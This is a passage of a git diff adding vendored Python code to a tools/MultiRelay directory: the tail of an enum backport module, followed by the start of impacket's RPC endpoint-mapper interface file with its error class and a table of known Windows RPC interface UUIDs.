= [] # names in random order + enum_class._member_map_ = {} # name->value map + enum_class._member_type_ = member_type + + # Reverse value->name map for hashable values. + enum_class._value2member_map_ = {} + + # check for a __getnewargs__, and if not present sabotage + # pickling, since it won't work anyway + if (member_type is not object and + member_type.__dict__.get('__getnewargs__') is None + ): + _make_class_unpicklable(enum_class) + + # instantiate them, checking for duplicates as we go + # we instantiate first instead of checking for duplicates first in case + # a custom __new__ is doing something funky with the values -- such as + # auto-numbering ;) + if __new__ is None: + __new__ = enum_class.__new__ + for member_name in __order__: + value = members[member_name] + if not isinstance(value, tuple): + args = (value, ) + else: + args = value + if member_type is tuple: # special case for tuple enums + args = (args, ) # wrap it one more time + if not use_args or not args: + enum_member = __new__(enum_class) + if not hasattr(enum_member, '_value_'): + enum_member._value_ = value + else: + enum_member = __new__(enum_class, *args) + if not hasattr(enum_member, '_value_'): + enum_member._value_ = member_type(*args) + value = enum_member._value_ + enum_member._name_ = member_name + enum_member.__objclass__ = enum_class + enum_member.__init__(*args) + # If another member with the same value was already defined, the + # new member becomes an alias to the existing one. + for name, canonical_member in enum_class._member_map_.items(): + if canonical_member.value == enum_member._value_: + enum_member = canonical_member + break + else: + # Aliases don't appear in member names (only in __members__). + enum_class._member_names_.append(member_name) + enum_class._member_map_[member_name] = enum_member + try: + # This may fail if value is not hashable. We can't add the value + # to the map, and by-value lookups for this value will be + # linear. + enum_class._value2member_map_[value] = enum_member + except TypeError: + pass + + # in Python2.x we cannot know definition order, so go with value order + # unless __order__ was specified in the class definition + if not order_specified: + enum_class._member_names_ = [ + e[0] for e in sorted( + [(name, enum_class._member_map_[name]) for name in enum_class._member_names_], + key=lambda t: t[1]._value_ + )] + + # double check that repr and friends are not the mixin's or various + # things break (such as pickle) + if Enum is not None: + setattr(enum_class, '__getnewargs__', Enum.__getnewargs__) + for name in ('__repr__', '__str__', '__format__'): + class_method = getattr(enum_class, name) + obj_method = getattr(member_type, name, None) + enum_method = getattr(first_enum, name, None) + if obj_method is not None and obj_method is class_method: + setattr(enum_class, name, enum_method) + + # method resolution and int's are not playing nice + # Python's less than 2.6 use __cmp__ + + if pyver < 2.6: + + if issubclass(enum_class, int): + setattr(enum_class, '__cmp__', getattr(int, '__cmp__')) + + elif pyver < 3.0: + + if issubclass(enum_class, int): + for method in ( + '__le__', + '__lt__', + '__gt__', + '__ge__', + '__eq__', + '__ne__', + '__hash__', + ): + setattr(enum_class, method, getattr(int, method)) + + # replace any other __new__ with our own (as long as Enum is not None, + # anyway) -- again, this is to support pickle + if Enum is not None: + # if the user defined their own __new__, save it before it gets + # clobbered in case they subclass later + if save_new: + setattr(enum_class, '__member_new__', enum_class.__dict__['__new__']) + setattr(enum_class, '__new__', Enum.__dict__['__new__']) + return enum_class + + def __call__(cls, value, names=None, module=None, type=None): + """Either returns an existing member, or creates a new enum class. + + This method is used both when an enum class is given a value to match + to an enumeration member (i.e. Color(3)) and for the functional API + (i.e. Color = Enum('Color', names='red green blue')). + + When used for the functional API: `module`, if set, will be stored in + the new class' __module__ attribute; `type`, if set, will be mixed in + as the first base class. + + Note: if `module` is not set this routine will attempt to discover the + calling module by walking the frame stack; if this is unsuccessful + the resulting class will not be pickleable. + + """ + if names is None: # simple value lookup + return cls.__new__(cls, value) + # otherwise, functional API: we're creating a new Enum type + return cls._create_(value, names, module=module, type=type) + + def __contains__(cls, member): + return isinstance(member, cls) and member.name in cls._member_map_ + + def __delattr__(cls, attr): + # nicer error message when someone tries to delete an attribute + # (see issue19025). + if attr in cls._member_map_: + raise AttributeError( + "%s: cannot delete Enum member." % cls.__name__) + super(EnumMeta, cls).__delattr__(attr) + + def __dir__(self): + return (['__class__', '__doc__', '__members__', '__module__'] + + self._member_names_) + + @property + def __members__(cls): + """Returns a mapping of member name->value. + + This mapping lists all enum members, including aliases. Note that this + is a copy of the internal mapping. + + """ + return cls._member_map_.copy() + + def __getattr__(cls, name): + """Return the enum member matching `name` + + We use __getattr__ instead of descriptors or inserting into the enum + class' __dict__ in order to support `name` and `value` being both + properties for enum members (which live in the class' __dict__) and + enum members themselves. + + """ + if _is_dunder(name): + raise AttributeError(name) + try: + return cls._member_map_[name] + except KeyError: + raise AttributeError(name) + + def __getitem__(cls, name): + return cls._member_map_[name] + + def __iter__(cls): + return (cls._member_map_[name] for name in cls._member_names_) + + def __reversed__(cls): + return (cls._member_map_[name] for name in reversed(cls._member_names_)) + + def __len__(cls): + return len(cls._member_names_) + + def __repr__(cls): + return "" % cls.__name__ + + def __setattr__(cls, name, value): + """Block attempts to reassign Enum members. + + A simple assignment to the class namespace only changes one of the + several possible ways to get an Enum member from the Enum class, + resulting in an inconsistent Enumeration. + + """ + member_map = cls.__dict__.get('_member_map_', {}) + if name in member_map: + raise AttributeError('Cannot reassign members.') + super(EnumMeta, cls).__setattr__(name, value) + + def _create_(cls, class_name, names=None, module=None, type=None): + """Convenience method to create a new Enum class. + + `names` can be: + + * A string containing member names, separated either with spaces or + commas. Values are auto-numbered from 1. + * An iterable of member names. Values are auto-numbered from 1. + * An iterable of (member name, value) pairs. + * A mapping of member name -> value. + + """ + metacls = cls.__class__ + if type is None: + bases = (cls, ) + else: + bases = (type, cls) + classdict = metacls.__prepare__(class_name, bases) + __order__ = [] + + # special processing needed for names? + if isinstance(names, str): + names = names.replace(',', ' ').split() + if isinstance(names, (tuple, list)) and isinstance(names[0], str): + names = [(e, i+1) for (i, e) in enumerate(names)] + + # Here, names is either an iterable of (name, value) or a mapping. + for item in names: + if isinstance(item, str): + member_name, member_value = item, names[item] + else: + member_name, member_value = item + classdict[member_name] = member_value + __order__.append(member_name) + # only set __order__ in classdict if name/value was not from a mapping + if not isinstance(item, str): + classdict['__order__'] = ' '.join(__order__) + enum_class = metacls.__new__(metacls, class_name, bases, classdict) + + # TODO: replace the frame hack if a blessed way to know the calling + # module is ever developed + if module is None: + try: + module = _sys._getframe(2).f_globals['__name__'] + except (AttributeError, ValueError): + pass + if module is None: + _make_class_unpicklable(enum_class) + else: + enum_class.__module__ = module + + return enum_class + + @staticmethod + def _get_mixins_(bases): + """Returns the type for creating enum members, and the first inherited + enum class. + + bases: the tuple of bases that was given to __new__ + + """ + if not bases or Enum is None: + return object, Enum + + + # double check that we are not subclassing a class with existing + # enumeration members; while we're at it, see if any other data + # type has been mixed in so we can use the correct __new__ + member_type = first_enum = None + for base in bases: + if (base is not Enum and + issubclass(base, Enum) and + base._member_names_): + raise TypeError("Cannot extend enumerations") + # base is now the last base in bases + if not issubclass(base, Enum): + raise TypeError("new enumerations must be created as " + "`ClassName([mixin_type,] enum_type)`") + + # get correct mix-in type (either mix-in type of Enum subclass, or + # first base if last base is Enum) + if not issubclass(bases[0], Enum): + member_type = bases[0] # first data type + first_enum = bases[-1] # enum type + else: + for base in bases[0].__mro__: + # most common: (IntEnum, int, Enum, object) + # possible: (, , + # , , + # ) + if issubclass(base, Enum): + if first_enum is None: + first_enum = base + else: + if member_type is None: + member_type = base + + return member_type, first_enum + + if pyver < 3.0: + @staticmethod + def _find_new_(classdict, member_type, first_enum): + """Returns the __new__ to be used for creating the enum members. + + classdict: the class dictionary given to __new__ + member_type: the data type whose __new__ will be used by default + first_enum: enumeration to check for an overriding __new__ + + """ + # now find the correct __new__, checking to see of one was defined + # by the user; also check earlier enum classes in case a __new__ was + # saved as __member_new__ + __new__ = classdict.get('__new__', None) + if __new__: + return None, True, True # __new__, save_new, use_args + + N__new__ = getattr(None, '__new__') + O__new__ = getattr(object, '__new__') + if Enum is None: + E__new__ = N__new__ + else: + E__new__ = Enum.__dict__['__new__'] + # check all possibles for __member_new__ before falling back to + # __new__ + for method in ('__member_new__', '__new__'): + for possible in (member_type, first_enum): + try: + target = possible.__dict__[method] + except (AttributeError, KeyError): + target = getattr(possible, method, None) + if target not in [ + None, + N__new__, + O__new__, + E__new__, + ]: + if method == '__member_new__': + classdict['__new__'] = target + return None, False, True + if isinstance(target, staticmethod): + target = target.__get__(member_type) + __new__ = target + break + if __new__ is not None: + break + else: + __new__ = object.__new__ + + # if a non-object.__new__ is used then whatever value/tuple was + # assigned to the enum member name will be passed to __new__ and to the + # new enum member's __init__ + if __new__ is object.__new__: + use_args = False + else: + use_args = True + + return __new__, False, use_args + else: + @staticmethod + def _find_new_(classdict, member_type, first_enum): + """Returns the __new__ to be used for creating the enum members. + + classdict: the class dictionary given to __new__ + member_type: the data type whose __new__ will be used by default + first_enum: enumeration to check for an overriding __new__ + + """ + # now find the correct __new__, checking to see of one was defined + # by the user; also check earlier enum classes in case a __new__ was + # saved as __member_new__ + __new__ = classdict.get('__new__', None) + + # should __new__ be saved as __member_new__ later? + save_new = __new__ is not None + + if __new__ is None: + # check all possibles for __member_new__ before falling back to + # __new__ + for method in ('__member_new__', '__new__'): + for possible in (member_type, first_enum): + target = getattr(possible, method, None) + if target not in ( + None, + None.__new__, + object.__new__, + Enum.__new__, + ): + __new__ = target + break + if __new__ is not None: + break + else: + __new__ = object.__new__ + + # if a non-object.__new__ is used then whatever value/tuple was + # assigned to the enum member name will be passed to __new__ and to the + # new enum member's __init__ + if __new__ is object.__new__: + use_args = False + else: + use_args = True + + return __new__, save_new, use_args + + +######################################################## +# In order to support Python 2 and 3 with a single +# codebase we have to create the Enum methods separately +# and then use the `type(name, bases, dict)` method to +# create the class. +######################################################## +temp_enum_dict = {} +temp_enum_dict['__doc__'] = "Generic enumeration.\n\n Derive from this class to define new enumerations.\n\n" + +def __new__(cls, value): + # all enum instances are actually created during class construction + # without calling this method; this method is called by the metaclass' + # __call__ (i.e. Color(3) ), and by pickle + if type(value) is cls: + # For lookups like Color(Color.red) + value = value.value + #return value + # by-value search for a matching enum member + # see if it's in the reverse mapping (for hashable values) + try: + if value in cls._value2member_map_: + return cls._value2member_map_[value] + except TypeError: + # not there, now do long search -- O(n) behavior + for member in cls._member_map_.values(): + if member.value == value: + return member + raise ValueError("%s is not a valid %s" % (value, cls.__name__)) +temp_enum_dict['__new__'] = __new__ +del __new__ + +def __repr__(self): + return "<%s.%s: %r>" % ( + self.__class__.__name__, self._name_, self._value_) +temp_enum_dict['__repr__'] = __repr__ +del __repr__ + +def __str__(self): + return "%s.%s" % (self.__class__.__name__, self._name_) +temp_enum_dict['__str__'] = __str__ +del __str__ + +def __dir__(self): + added_behavior = [m for m in self.__class__.__dict__ if m[0] != '_'] + return (['__class__', '__doc__', '__module__', 'name', 'value'] + added_behavior) +temp_enum_dict['__dir__'] = __dir__ +del __dir__ + +def __format__(self, format_spec): + # mixed-in Enums should use the mixed-in type's __format__, otherwise + # we can get strange results with the Enum name showing up instead of + # the value + + # pure Enum branch + if self._member_type_ is object: + cls = str + val = str(self) + # mix-in branch + else: + cls = self._member_type_ + val = self.value + return cls.__format__(val, format_spec) +temp_enum_dict['__format__'] = __format__ +del __format__ + + +#################################### +# Python's less than 2.6 use __cmp__ + +if pyver < 2.6: + + def __cmp__(self, other): + if type(other) is self.__class__: + if self is other: + return 0 + return -1 + return NotImplemented + raise TypeError("unorderable types: %s() and %s()" % (self.__class__.__name__, other.__class__.__name__)) + temp_enum_dict['__cmp__'] = __cmp__ + del __cmp__ + +else: + + def __le__(self, other): + raise TypeError("unorderable types: %s() <= %s()" % (self.__class__.__name__, other.__class__.__name__)) + temp_enum_dict['__le__'] = __le__ + del __le__ + + def __lt__(self, other): + raise TypeError("unorderable types: %s() < %s()" % (self.__class__.__name__, other.__class__.__name__)) + temp_enum_dict['__lt__'] = __lt__ + del __lt__ + + def __ge__(self, other): + raise TypeError("unorderable types: %s() >= %s()" % (self.__class__.__name__, other.__class__.__name__)) + temp_enum_dict['__ge__'] = __ge__ + del __ge__ + + def __gt__(self, other): + raise TypeError("unorderable types: %s() > %s()" % (self.__class__.__name__, other.__class__.__name__)) + temp_enum_dict['__gt__'] = __gt__ + del __gt__ + + +def __eq__(self, other): + if type(other) is self.__class__: + return self is other + return NotImplemented +temp_enum_dict['__eq__'] = __eq__ +del __eq__ + +def __ne__(self, other): + if type(other) is self.__class__: + return self is not other + return NotImplemented +temp_enum_dict['__ne__'] = __ne__ +del __ne__ + +def __getnewargs__(self): + return (self._value_, ) +temp_enum_dict['__getnewargs__'] = __getnewargs__ +del __getnewargs__ + +def __hash__(self): + return hash(self._name_) +temp_enum_dict['__hash__'] = __hash__ +del __hash__ + +# _RouteClassAttributeToGetattr is used to provide access to the `name` +# and `value` properties of enum members while keeping some measure of +# protection from modification, while still allowing for an enumeration +# to have members named `name` and `value`. This works because enumeration +# members are not set directly on the enum class -- __getattr__ is +# used to look them up. + +@_RouteClassAttributeToGetattr +def name(self): + return self._name_ +temp_enum_dict['name'] = name +del name + +@_RouteClassAttributeToGetattr +def value(self): + return self._value_ +temp_enum_dict['value'] = value +del value + +Enum = EnumMeta('Enum', (object, ), temp_enum_dict) +del temp_enum_dict + +# Enum has now been created +########################### + +class IntEnum(int, Enum): + """Enum where members are also (and must be) ints""" + + +def unique(enumeration): + """Class decorator that ensures only unique members exist in an enumeration.""" + duplicates = [] + for name, member in enumeration.__members__.items(): + if name != member.name: + duplicates.append((name, member.name)) + if duplicates: + duplicate_names = ', '.join( + ["%s -> %s" % (alias, name) for (alias, name) in duplicates] + ) + raise ValueError('duplicate names found in %r: %s' % + (enumeration, duplicate_names) + ) + return enumeration diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/epm.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/epm.py new file mode 100644 index 0000000..d795d36 --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/epm.py @@ -0,0 +1,1383 @@ +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: Alberto Solino (@agsolino) +# +# Description: +# [MS-RPCE]-C706 Interface implementation for the remote portmapper +# +# Best way to learn how to use these calls is to grab the protocol standard +# so you understand what the call does, and then read the test case located +# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC +# +# Some calls have helper functions, which makes it even easier to use. +# They are located at the end of this file. +# Helper functions start with "h". +# There are test cases for them too. +# +import socket +from struct import unpack +from six import b + +from impacket.uuid import uuidtup_to_bin, bin_to_string +from impacket.dcerpc.v5 import transport +from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantVaryingArray, NDRUniVaryingArray, \ + NDRUniConformantArray +from impacket.dcerpc.v5.dtypes import UUID, LPBYTE, PUUID, ULONG, USHORT +from impacket.structure import Structure +from impacket.dcerpc.v5.ndr import NULL +from impacket.dcerpc.v5.rpcrt import DCERPCException +from impacket import LOG + +MSRPC_UUID_PORTMAP = uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA', '3.0')) + +class DCERPCSessionError(DCERPCException): + error_messages = {} + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + self.error_code = packet['status'] + + def __str__( self ): + key = self.error_code + if key in self.error_messages: + error_msg_short = self.error_messages[key] + return 'EPM SessionError: code: 0x%x - %s ' % (self.error_code, error_msg_short) + else: + return 'EPM SessionError: unknown error code: %s' % (str(self.error_code)) + +################################################################################ +# CONSTANTS +################################################################################ + +KNOWN_UUIDS = { +b"\xb0\x01\x52\x97\xca\x59\xd0\x11\xa8\xd5\x00\xa0\xc9\x0d\x80\x51\x01\x00": "rpcss.dll", +b"\xf1\x8f\x37\xc9\xf7\x16\xd0\x11\xa0\xb2\x00\xaa\x00\x61\x42\x6a\x01\x00": "pstorsvc.dll", +b"\xd4\xa7\x72\x0d\x48\x61\xd1\x11\xb4\xaa\x00\xc0\x4f\xb6\x6e\xa0\x01\x00": "cryptsvc.dll", +b"\x40\x4e\x9f\x8d\x3d\xa0\xce\x11\x8f\x69\x08\x00\x3e\x30\x05\x1b\x01\x00": "services.exe", +b"\xc5\x86\x5a\xda\xc2\x12\x43\x49\xab\x30\x7f\x74\xa8\x13\xd8\x53\x01\x00": "regsvc.dll", +b"\x29\x07\x8a\xfb\x04\x2d\x58\x46\xbe\x93\x27\xb4\xad\x55\x3f\xac\x01\x00": "lsass.exe", +b"\x04\xf7\xd9\x52\xc6\xd3\x48\x47\xad\x11\x25\x50\x20\x9e\x80\xaf\x00\x00": "IMEPADSM.DLL", +b"\xce\xad\x21\xc4\xb2\xa0\x0d\x48\x84\x18\x98\x44\x95\xb3\x2d\x5f\x01\x00": "SLsvc.exe", +b"\x14\xb5\xfb\xd3\x3b\x0e\xcb\x11\x8f\xad\x08\x00\x2b\x1d\x29\xc3\x01\x00": "locator.exe", +b"\x6f\x40\x1c\xf6\x60\xbd\x94\x41\x95\x65\xbf\xed\xd5\x25\x6f\x70\x01\x00": "p2phost.exe", +b"\x72\x33\x3d\xc1\x20\xcc\x49\x44\x9b\x23\x8c\xc8\x27\x1b\x38\x85\x01\x00": "rpcrt4.dll", +b"\x70\xfe\x5a\xd9\xd5\xa6\x59\x42\x82\x2e\x2c\x84\xda\x1d\xdb\x0d\x01\x00": "wininit.exe", +b"\x6a\x07\x2d\x55\x29\xcb\x44\x4e\x8b\x6a\xd1\x5e\x59\xe2\xc0\xaf\x01\x00": "iphlpsvc.dll", +b"\x95\x4f\x25\xd4\xc3\x08\xcc\x4f\xb2\xa6\x0b\x65\x13\x77\xa2\x9d\x01\x00": "wwansvc.dll", +b"\x43\x9a\x89\x11\x68\x2b\x76\x4a\x92\xe3\xa3\xd6\xad\x8c\x26\xce\x01\x00": "lsm.exe", +b"\xb4\x33\x6f\x26\xc1\xc7\xd1\x4b\x8f\x52\xdd\xb8\xf2\x21\x4e\xa9\x01\x00": "wlansvc.dll", +b"\x68\x9d\xcb\x2a\x34\xb4\x3e\x4b\xb9\x66\xe0\x6b\x4b\x3a\x84\xcb\x01\x00": "bthserv.dll", +b"\xd0\x4c\x67\x57\x00\x52\xce\x11\xa8\x97\x08\x00\x2b\x2e\x9c\x6d\x01\x00": "llssrv.exe", +b"\x52\x44\x7d\x64\x33\x9f\x18\x4a\xb2\xbe\xc5\xc0\xe9\x20\xe9\x4e\x01\x00": "pla.dll", +b"\xc8\x9b\x3b\xde\xf7\xbe\x78\x45\xa0\xde\xf0\x89\x04\x84\x42\xdb\x01\x00": "audiodg.exe", +b"\xd1\x51\xa9\xbf\x0e\x2f\xd3\x11\xbf\xd1\x00\xc0\x4f\xa3\x49\x0a\x01\x00": "aqueue.dll", +b"\x84\x55\x66\x1e\xfe\x40\x50\x44\x8f\x6e\x80\x23\x62\x39\x96\x94\x01\x00": "lsm.exe", +b"\x41\x76\x17\xaa\x9b\xfc\xbd\x41\x80\xff\xf9\x64\xa7\x01\x59\x6f\x01\x00": "tssdis.exe", +b"\xe0\x0c\x6b\x90\x0b\xc7\x67\x10\xb3\x17\x00\xdd\x01\x06\x62\xda\x01\x00": "msdtcprx.dll", +b"\x51\xb9\x6b\xfd\x30\xc8\x34\x47\xbf\x2c\x18\xba\x6e\xc7\xab\x49\x01\x00": "iscsiexe.dll", +b"\x68\xff\x1d\x62\x39\x3c\x6c\x4c\xaa\xe3\xe6\x8e\x2c\x65\x03\xad\x01\x00": "wzcsvc.dll", +b"\x56\xcc\x35\x94\x9c\x1d\x24\x49\xac\x7d\xb6\x0a\x2c\x35\x20\xe1\x01\x00": "sppsvc.exe", +b"\xf0\xe4\x9c\x36\xdc\x0f\xd3\x11\xbd\xe8\x00\xc0\x4f\x8e\xee\x78\x01\x00": "profmap.dll", +b"\x6a\x28\x19\x39\x0c\xb1\xd0\x11\x9b\xa8\x00\xc0\x4f\xd9\x2e\xf5\x00\x00": "lsasrv.dll", +b"\x80\x2b\xd1\x76\x67\x34\xd3\x11\x91\xff\x00\x90\x27\x2f\x9e\xa3\x01\x00": "mqqm.dll", +b"\x72\xfe\x0f\x8d\x52\xd2\xd0\x11\xbf\x8f\x00\xc0\x4f\xd9\x12\x6b\x01\x00": "cryptsvc.dll", +b"\x86\xd4\xdc\x68\x9e\x66\xd1\x11\xab\x0c\x00\xc0\x4f\xc2\xdc\xd2\x01\x00": "ismserv.exe", +b"\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa\x03\x00\x00": "rpcss.dll", +b"\x06\x91\x01\x24\x03\xa2\x42\x46\xb8\x8d\x82\xda\xe9\x15\x89\x29\x01\x00": "authui.dll", +b"\x60\xa7\xa4\x5c\xb1\xeb\xcf\x11\x86\x11\x00\xa0\x24\x54\x20\xed\x01\x00": "termsrv.dll", +b"\x4d\xdd\x73\x34\x88\x2e\x06\x40\x9c\xba\x22\x57\x09\x09\xdd\x10\x05\x01": "winhttp.dll", +b"\xb2\xb8\x7d\xb9\x63\x4c\xcf\x11\xbf\xf6\x08\x00\x2b\xe2\x3f\x2f\x02\x00": "clussvc.exe", +b"\x95\x1f\x51\x33\x84\x5b\xcc\x4d\xb6\xcc\x3f\x4b\x21\xda\x53\xe1\x01\x00": "ubpm.dll", +b"\x78\xb2\xeb\x05\x14\xe1\xc1\x4e\xa5\xa3\x09\x61\x53\xf3\x00\xe4\x01\x01": "tsgqec.dll", +b"\x24\xe4\xfb\x63\x29\x20\xd1\x11\x8d\xb8\x00\xaa\x00\x4a\xbd\x5e\x01\x00": "Sens.dll", +b"\x36\xa0\x67\x07\x22\x0d\xaa\x48\xba\x69\xb6\x19\x48\x0f\x38\xcb\x01\x00": "pcasvc.dll", +b"\x20\x32\x5f\x2f\x26\xc1\x76\x10\xb5\x49\x07\x4d\x07\x86\x19\xda\x01\x00": "netdde.exe", +b"\x30\xa0\xb3\xfd\x5f\x06\xd1\x11\xbb\x9b\x00\xa0\x24\xea\x55\x25\x01\x00": "mqqm.dll", +b"\x80\x7a\xdf\x77\x98\xf2\xd0\x11\x83\x58\x00\xa0\x24\xc4\x80\xa8\x01\x00": "mqdssrv.dll", +b"\x03\x6d\x71\x98\xac\x89\xc7\x44\xbb\x8c\x28\x58\x24\xe5\x1c\x4a\x01\x00": "srvsvc.dll", +b"\xc8\xad\x32\x4f\x52\x60\x04\x4a\x87\x01\x29\x3c\xcf\x20\x96\xf0\x01\x00": "sspisrv.dll", +b"\x90\x38\xa9\x65\xb9\xfa\xa3\x43\xb2\xa5\x1e\x33\x0a\xc2\x8f\x11\x02\x00": "dnsrslvr.dll", +b"\x32\xf5\x03\xc5\x3a\x44\x69\x4c\x83\x00\xcc\xd1\xfb\xdb\x38\x39\x01\x00": "MpSvc.dll", +b"\x46\x9f\x3b\xc3\x88\x20\xbc\x4d\x97\xe3\x61\x25\xf1\x27\x66\x1c\x01\x00": "nlasvc.dll", +b"\xa0\xb3\x02\xa0\xb7\xc9\xd1\x11\xae\x88\x00\x80\xc7\x5e\x4e\xc1\x01\x00": "wlnotify.dll", +b"\xd0\xd1\x33\x88\x5f\x96\x16\x42\xb3\xe9\xfb\xe5\x8c\xad\x31\x00\x01\x00": "SCardSvr.dll", +b"\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a\x01\x00": "wkssvc.dll", +b"\x38\x8d\x04\x7e\x08\xac\xf1\x4f\x8e\x6b\xf3\x5d\xba\xb8\x8d\x4a\x01\x00": "mqqm.dll", +b"\x35\x42\x51\xe3\x06\x4b\xd1\x11\xab\x04\x00\xc0\x4f\xc2\xdc\xd2\x04\x00": "ntdsai.dll", +b"\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88\x00\x00": "sfmsvc.exe", +b"\xc5\x28\x47\x3c\xab\xf0\x8b\x44\xbd\xa1\x6c\xe0\x1e\xb0\xa6\xd6\x01\x00": "dhcpcsvc6.dll", +b"\x36\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00": "rpcss.dll", +b"\x54\x79\x26\x3d\xb7\xee\xd1\x11\xb9\x4e\x00\xc0\x4f\xa3\x08\x0d\x01\x00": "lserver.dll", +b"\xbf\x09\x11\x81\xe1\xa4\xd1\x11\xab\x54\x00\xa0\xc9\x1e\x9b\x45\x01\x00": "WINS.EXE", +b"\xd0\xbb\xf5\x7a\x63\x60\xd1\x11\xae\x2a\x00\x80\xc7\x5e\x4e\xc1\x00\x00": "irmon.dll", +b"\x99\x1e\xb8\x12\x07\xf2\x4c\x4a\x85\xd3\x77\xb4\x2f\x76\xfd\x14\x01\x00": "seclogon.dll", +b"\x6c\x5e\x64\x00\x9f\xfc\x0c\x4a\x98\x96\xf0\x0b\x66\x29\x77\x98\x01\x00": "icardagt.exe", +b"\x9f\x2f\x5b\xb1\x3c\x90\x71\x46\x8d\xc0\x77\x2c\x54\x21\x40\x68\x01\x00": "pwmig.dll", +b"\xa6\x95\x7d\x49\x27\x2d\xf5\x4b\x9b\xbd\xa6\x04\x69\x57\x13\x3c\x01\x00": "termsrv.dll", +b"\xcb\x92\xbe\x5c\xbe\xf4\xc9\x45\x9f\xc9\x33\xe7\x3e\x55\x7b\x20\x01\x00": "lsasrv.dll", +b"\xa1\x0f\x51\x69\x99\x2f\xeb\x4e\xa4\xff\xaf\x25\x9f\x0f\x97\x49\x01\x00": "wecsvc.dll", +b"\x70\x5d\xfb\x8c\xa4\x31\xcf\x11\xa7\xd8\x00\x80\x5f\x48\xa1\x35\x03\x00": "smtpsvc.dll", +b"\x46\x0d\x85\x77\x1d\x85\xb6\x43\x93\x98\x29\x01\x61\xf0\xca\xe6\x01\x00": "SeVA.dll", +b"\xc3\x26\xf2\x76\x14\xec\x25\x43\x8a\x99\x6a\x46\x34\x84\x18\xaf\x01\x00": "winlogon.exe", +b"\x84\x65\x0a\x0b\x0f\x9e\xcf\x11\xa3\xcf\x00\x80\x5f\x68\xcb\x1b\x01\x00": "rpcss.dll", +b"\x15\x55\xf2\x11\x79\xc8\x0a\x40\x98\x9e\xb0\x74\xd5\xf0\x92\xfe\x01\x00": "lsm.exe", +b"\xc0\xe0\x4d\x89\x55\x0d\xd3\x11\xa3\x22\x00\xc0\x4f\xa3\x21\xa1\x01\x00": "wininit.exe", +b"\x00\xac\x0a\xf5\xf3\xc7\x8e\x42\xa0\x22\xa6\xb7\x1b\xfb\x9d\x43\x01\x00": "cryptsvc.dll", +b"\xa5\x44\xb0\x30\x25\xa2\xf0\x43\xb3\xa4\xe0\x60\xdf\x91\xf9\xc1\x01\x00": "certprop.dll", +b"\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab\x00\x00": "lsasrv.dll", +b"\x49\x69\xe9\x98\x59\xbc\xf1\x47\x92\xd1\x8c\x25\xb4\x6f\x85\xc7\x01\x00": "wlanext.exe", +b"\xb8\x61\xe5\xff\x15\xbf\xcf\x11\x8c\x5e\x08\x00\x2b\xb4\x96\x49\x02\x00": "clussvc.exe", +b"\xb4\x59\xcc\xf5\x64\x42\x1a\x10\x8c\x59\x08\x00\x2b\x2f\x84\x26\x01\x00": "ntfrs.exe", +b"\xb4\x59\xcc\xf5\x64\x42\x1a\x10\x8c\x59\x08\x00\x2b\x2f\x84\x26\x01\x01": "ntfrs.exe", +b"\xa4\xc2\xab\x50\x4d\x57\xb3\x40\x9d\x66\xee\x4f\xd5\xfb\xa0\x76\x05\x00": "dns.exe", +b"\xb9\x99\x3f\x87\x4d\x1b\x10\x99\xb7\xaa\x00\x04\x00\x7f\x07\x01\x00\x00": "ssmsrp70.dll", +b"\x01\xc3\x53\xb2\xa2\x78\x70\x42\xa9\x1f\x66\x0d\xee\x06\x9f\x4c\x01\x00": "rdpcore.dll", +b"\x94\x68\x71\x22\x8e\xfd\x62\x44\x97\x83\x09\xe6\xd9\x53\x1f\x16\x01\x00": "ubpm.dll", +b"\xf6\xb8\x35\xd3\x31\xcb\xd0\x11\xb0\xf9\x00\x60\x97\xba\x4e\x54\x01\x00": "polagent.dll", +b"\x64\x1d\x82\x0c\xfc\xa3\xd1\x11\xbb\x7a\x00\x80\xc7\x5e\x4e\xc1\x01\x00": "irftp.exe", +b"\xb8\x4a\x9f\x4d\x1c\x7d\xcf\x11\x86\x1e\x00\x20\xaf\x6e\x7c\x57\x00\x00": "rpcss.dll", +b"\xa8\x95\xee\x81\x2e\x88\x15\x46\x88\x8a\x53\x34\x4c\xa1\x49\xe4\x01\x00": "vpnikeapi.dll", +b"\xfb\xee\x0c\x13\x66\xe4\xd1\x11\xb7\x8b\x00\xc0\x4f\xa3\x28\x83\x02\x00": "ismip.dll", +b"\x72\xee\xf3\xc6\x7e\xce\xd1\x11\xb7\x1e\x00\xc0\x4f\xc3\x11\x1a\x01\x00": "rpcss.dll", +b"\x9a\xf9\x1e\x20\xa0\x7f\x4c\x44\x93\x99\x19\xba\x84\xf1\x2a\x1a\x01\x00": "appinfo.dll", +b"\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88\x03\x00": "srvsvc.dll", +b"\x72\xe4\x9f\x6d\xf1\x30\x08\x47\x8f\xa8\x67\x83\x62\xb9\x61\x55\x01\x00": "wimserv.exe", +b"\xd4\xd7\x44\x7c\xd5\x31\x4c\x42\xbd\x5e\x2b\x3e\x1f\x32\x3d\x22\x01\x00": "ntdsai.dll", +b"\x55\x1a\x20\x6f\x4d\xa2\x5f\x49\xaa\xc9\x2f\x4f\xce\x34\xdf\x99\x01\x00": "IPHLPAPI.DLL", +b"\x32\x35\x0f\x30\xcc\x38\xd0\x11\xa3\xf0\x00\x20\xaf\x6b\x0a\xdd\x01\x02": "trkwks.dll", +b"\x32\x35\x0f\x30\xcc\x38\xd0\x11\xa3\xf0\x00\x20\xaf\x6b\x0a\xdd\x01\x00": "trkwks.dll", 